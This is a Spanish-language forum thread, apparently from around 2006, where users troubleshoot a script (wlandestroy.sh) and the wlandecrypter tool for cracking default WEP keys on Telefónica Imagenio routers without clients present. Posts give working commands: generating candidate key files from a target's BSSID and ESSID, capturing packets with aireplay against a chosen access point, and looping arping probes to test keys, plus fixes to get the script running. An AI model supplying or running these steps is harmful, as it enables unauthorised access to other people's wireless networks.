 Autor
|
Tema: descifrar redes IMAGENIO sin clientes y sin paquetes ;) (Leído 46,721 veces)
|
|
nilp0inter
|
no tengo el wlandecrypter en linux...puedo generar el archivo de claves en windows y logo utilizarlo en linux?? en win como lo genero??
Puedes usar el de win sin problemas con la misma sintaxis: wlandecrypter.exe {BSSID} {ESSID} {fichero_claves} Por ejemplo: wlandecrypter.exe 00:60:B3:XX:XX:XX WLAN_XX claves.txt Pero te recomiendo que te bajes la ultima version que he subido al megaupload (0.4) porque soporta todos los modelos de router que hemos visto hasta el momento. Saludos
|
|
|
|
|
En línea
|
|
|
|
cohone
 Desconectado
Mensajes: 194
|
while [ "$(iwconfig 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" == "0" ]; do Aquí se debería pasar la interface al iwconfig, si tienes más de una no te devuelve un 0, en mi caso tengo 3 if y devuelve: 0
0
0
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" == "0" ]; do Una observación. Me he dado cuenta probando el script en una debian que cuando instalas el arping2 te lo instala como arping "a secas", asi que la linea
Código:
arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
sustituidla por
Código:
arping -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
en mi caso le tengo que poner la opción -i en mayúsculas -I$1 Quien lo pruebe que tenga en cuenta que el script no va a dar error, ya que la orden arping tiene redirigida la salida a null.
|
|
|
|
|
En línea
|
|
|
|
|
nilp0inter
|
Aquí se debería pasar la interface al iwconfig...
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" == "0" ]; do
Tienes razon, ahora lo cambio, yo es que solo tengo una en el portatil y no habia caido  en mi caso le tengo que poner la opción -i en mayúsculas -I$1
Hazme un favor, pegame lo que te sale en tu comando arping cuando lo ejecutas sin parametros, asi podre hacer que el script detecte cual de los dos es y utilice las opciones adecuadas. Gracias
|
|
|
|
|
En línea
|
|
|
|
cohone
Desconectado
Mensajes: 194
|
Aquí lo tienes Usage: arping [-fqbDUAV] [-c count] [-w timeout] [-I device] [-s source] destination
-f : quit on first reply
-q : be quiet
-b : keep broadcasting, don't go unicast
-D : duplicate address detection mode
-U : Unsolicited ARP mode, update your neighbours
-A : ARP answer mode, update your neighbours
-V : print version and exit
-c count : how many packets to send
-w timeout : how long to wait for a reply
-I device : which ethernet device to use (eth0)
-s source : source ip address
destination : ask for what ip address Es el de gentoo, dice que la homepage es:http://www.habets.pp.se/synscan/programs.php?prog=ARPing localhost ~ # arping -V
arping utility, iputils-ss021109 |
|
|
|
|
En línea
|
|
|
|
|
nilp0inter
|
He estado haciendo pruebas con arping y arping2 y me he dado cuenta que arping tarda mucho mas en enviar la peticion arp. Supongo que es porque arping espera a recibir respuesta y arping2 no. lotus nil # time arping -Iath0 -w0 -q -c1 192.168.200.54
real 0m1.005s
user 0m0.000s
sys 0m0.001s
lotus nil # time arping2 -iath0 -w0 -q -c1 192.168.200.54
real 0m0.014s
user 0m0.001s
sys 0m0.000s
Como podeis ver arping tarda 1 segundo y poco mientras que arping2 tarda 0.014 segundos.  Asi que creo que lo mejor es usar arping2... Mi version es esta: lotus nil # arping2
ARPing 2.05, by Thomas Habets <thomas@habets.pp.se>
usage: arping [ -0aAbdFpqrRuv ] [ -w <us> ] [ -S <host/ip> ] [ -T <host/ip ]
[ -s <MAC> ] [ -t <MAC> ] [ -c <count> ] [ -i <interface> ]
<host/ip/MAC | -B>
Arping2 lo podeis encontrar aqui:http://www.habets.pp.se/synscan/programs.php?prog=arping |
|
|
|
|
En línea
|
|
|
|
cohone
Desconectado
Mensajes: 194
|
Aquí lo tienes Usage: arping [-fqbDUAV] [-c count] [-w timeout] [-I device] [-s source] destination
-f : quit on first reply
-q : be quiet
-b : keep broadcasting, don't go unicast
-D : duplicate address detection mode
-U : Unsolicited ARP mode, update your neighbours
-A : ARP answer mode, update your neighbours
-V : print version and exit
-c count : how many packets to send
-w timeout : how long to wait for a reply
-I device : which ethernet device to use (eth0)
-s source : source ip address
destination : ask for what ip address Es el de gentoo, dice que la homepage es:http://www.habets.pp.se/synscan/programs.php?prog=ARPing localhost ~ # arping -V
arping utility, iputils-ss021109 ops, me colé, esta versión pertenece a una "suite" llamada iputils de http://ftp://ftp.inr.ac.ru/ip-routing, ahora mismo instalo al arping 
|
|
|
|
|
En línea
|
|
|
|
Elena_FranciX
Desconectado
Mensajes: 227
Sin City
|
./wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves}
Duda minuscula INTERFAZ??? la del Cliente "ejemplo Z-com" o la tarjeta de captura a usar (mi caso Ath0) tengo errores (5 lineas) y dudo de todo a estas horas, mañana actualizare varias librerias que me pide... (Troppix 1.2)
|
|
|
|
|
En línea
|
|
|
|
|
nilp0inter
|
./wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves}
INTERFAZ??? la del Cliente "ejemplo Z-com" o la tarjeta de captura a usar (mi caso Ath0)
La interfaz por la que quieras emitir los paquetes arp, en tu caso la ath0. 
|
|
|
|
|
En línea
|
|
|
|
|
Uxio
|
Una observación. Me he dado cuenta probando el script en una debian que cuando instalas el arping2 te lo instala como arping "a secas", asi que la linea arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1 sustituidla por arping -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1 es decir, quitadle el "2". Y andando Ah, venía a preguntarte ahora por eso, si yo lo había instalado mal en Debian, porque cambie esa línea, no tuve paciencia y a los 10 minutos me marché, pero a ver si hoy por la noche lo dejo más. ¡¡¡Pero de cualquier manera, magnífico programa nilp0inter!!!Una observación: ¿No podrías usar el ping en vez del arping? Porque el paquete que genera supongo que vale para extraer la key...
|
|
|
|
|
En línea
|
|
|
|
|
nilp0inter
|
Una observación: ¿No podrías usar el ping en vez del arping? Porque el paquete que genera supongo que vale para extraer la key...
Ten en cuenta que cuando envias un ping si tu tarjeta no tiene en su tabla arp la direccion mac de la ip destino tiene que solicitarla (hacer un arping) asi que si usaramos un ping primero deberia hacer un arping y como la mayoria de las claves que probamos no son la correcta, el ping se quedaria ahi esperando un buen rato... Asi que lo mejor es usar el arping2 este del enlace que he puesto arriba porque lo hace a toda pastilla. Saludos
|
|
|
|
|
En línea
|
|
|
|
|
|
.NiXoN.
Desconectado
Mensajes: 942
Ubuntu user :D
|
Wenas Una mini-duda wlandecrypter {BSSID} {ESSID} {fichero_claves} El fichero_claves de donde lo saco? o lo creo? Saludos |
|
|
|
|
En línea
|
El que todo lo sabe sabe que no todo lo sabe   |
|
|
|
nilp0inter
|
El fichero_claves de donde lo saco? o lo creo?
{fichero_de_claves} es el nombre del fichero donde el wlandecrypter te va a guardar las claves. Puedes poner cualquier cosa: pepito.txt, enculandoatelefonica.dat, en fin, lo que quieras
|
|
|
|
|
En línea
|
|
|
|
.NiXoN.
Desconectado
Mensajes: 942
Ubuntu user :D
|
Wenas....   VeS? ya decia yo que era una gilipollada, eske soy gilipollas (perdonarme, pero eske me lo tengo que autodecir ) Gracias nilp0inter, que hariamos sin ti. Saludos !! y gracias !! |
|
|
|
« Última modificación: 24 Junio 2006, 17:47 por .NiXoN. »
|
En línea
|
El que todo lo sabe sabe que no todo lo sabe |
|
|
.NiXoN.
Desconectado
Mensajes: 942
Ubuntu user :D
|
Wenas otra vé Mi problema es fácil; esto no me va:
./wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves}Tal y como dices nilp0inter hago TODO: Lo guardais como wlandestroy.sh o con otro nombre que os guste mas grin . Le dais permisos de ejecución ... Código: chmod u+x ./wlandestroy.sh Luego ago: Y los pasos a seguir son los siguientes:
* Buscais la red:
* Usando airodump, kismet o el escaner que mas os guste. Necesitais el nombre de la red (ESSID) y la MAC del AP (BSSID)Capturar paquete procedente del AP:
Para esto usaremos aireplay de la siguiente forma en una consola A PARTE:
Código:
aireplay -4 -b {BSSID} -f1 ath0
Si el router es un Comtrend 536+ (00:16:38:XX:XX:XX) es conveniente usar
Código:
aireplay -4 -b {BSSID} -n68 -m68 -f1 ath0
para que solo pille las respuestas arp, porque este router es un poco cabroncete.
NOTA: Se puede usar de otras formas, yo he usado esta porque lo he probado esta mañana y no he andao investigando mas.
* Si no os funciona usad ath0raw para capturar paquetes en vez de ath0Generar el archivo de claves:
Para esto usamos wlandecrypter.
Código:
wlandecrypter {BSSID} {ESSID} {fichero_claves} PERO CUADNO VOY HACER: ./wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves}No me funciona, alguien sabe xk???? Saludos y gracias !! |
|
|
|
|
En línea
|
El que todo lo sabe sabe que no todo lo sabe |
|
|
|
 |
